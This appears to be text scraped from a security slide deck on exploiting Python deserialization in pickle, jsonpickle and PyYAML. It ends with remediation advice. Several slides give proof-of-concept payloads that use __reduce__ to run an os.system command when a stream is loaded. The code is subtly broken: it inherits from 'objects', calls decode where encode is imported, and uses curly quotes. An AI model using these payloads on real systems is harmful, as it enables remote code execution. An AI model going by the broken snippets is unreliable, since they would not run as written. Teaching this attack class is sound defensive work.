5. Why we need serialization?
1. Recovery of original Structure.
2. Minimize the bandwidth.
3. Calling of class objects.
6. ● Thick client application and
desktop programs. Example :
metasploit, Pycharm, Intellij
IDEA etc.
● APIs.
● Mobile applications
Where is Serialization getting used ?
15. Pickling is a way to convert a python object (list, dict, etc.) into a
character stream. The idea is that this character stream contains all the
information necessary to reconstruct the object in another python script.
16. Serialization using pickle - pickle.dumps(Object)
Deserialization using pickle - pickle.loads(stream)
How to pickle and de-pickle ?
18. from pickle import dumps
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dumps(payload()))
How to exploit pickle deserialization ?
19. from pickle import loads
loads(stream)
How to exploit pickle deserialization ?
21. jsonpickle will serialize complex Python objects to and from JSON.It also
convert a pickled object into human readable form.
22. Serialization using jsonpickle - jsonpickle.encode(Object)
Deserialization using jsonpickle - jsonpickle.decode(stream)
How to jsonpickle and json de-pickle ?
23. It looks like normal JSON stream of data. Sometimes have a tag “py/” in it.
Detecting use of jsonpickle module
24. from jsonpickle import encode
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(decode(payload()))
How to exploit jsonpickle deserialization ?
25. from jsonpickle import decode
decode(stream)
How to exploit jsonpickle deserialization ?
27. Pyyaml python module is used to serialize objects in YAML (Yet Another
Markup Language) format. So this module is used to process YAML data.
● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342)
● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain
condition. (CVE-2019-20477)
● Latest version 5.3.1 of Pyyaml is not vulnerable.
28. Serialization using pyyaml - yaml.dump(Object)
Deserialization using pyyaml - yaml.load(stream)
How to YAML serialize and deserialize ?
29. It will be in a YAML format.
Detecting use of pyyaml/ruamel.yaml modules
30. from yaml import dump
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dump(payload()))
How to exploit pyyaml deserialization ?
31. from yaml import load
load(stream)
How to exploit pyyaml deserialization ?
32. Remediations
For jsonpickle and pickle,
Here, the general take-away would be the rule of thumb “Do not deserialize untrusted
data”
For Pyyaml,
● Use safe_dump() and safe_load() instead of dump() and load().
● Use latest version of pyyaml.